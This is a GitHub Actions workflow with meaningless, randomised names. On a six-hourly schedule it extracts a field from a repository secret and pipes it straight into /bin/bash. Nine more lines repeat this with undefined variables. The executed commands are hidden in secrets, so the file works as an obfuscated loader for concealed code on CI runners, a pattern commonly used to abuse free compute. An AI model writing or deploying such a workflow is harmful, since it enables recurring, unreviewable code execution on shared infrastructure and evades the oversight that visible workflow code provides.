name: piernuosi
on:
  workflow_dispatch:
  schedule:
    - cron: '58 3/6 * * *'
jobs:  # 17008
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: piernuosi
        env:
          ppp53: ${{ secrets.ppp53 }}
        run: |
          echo $ppp53 | jq -r .nzg71182 | /bin/bash
          echo $zmq0144 | jq -r .wic71841 | /bin/bash
          echo $jh8 | jq -r .fro43138 | /bin/bash
          echo $bhxd77934 | jq -r .yxsr303 | /bin/bash
          echo $tena0027 | jq -r .vbeag37 | /bin/bash
          echo $loid32 | jq -r .oqp8334 | /bin/bash
          echo $ttna05 | jq -r .my7367 | /bin/bash
          echo $ndnj785 | jq -r .uxv0 | /bin/bash
          echo $t0632 | jq -r .l465 | /bin/bash
          echo $gasmd78356 | jq -r .yzhp038 | /bin/bash

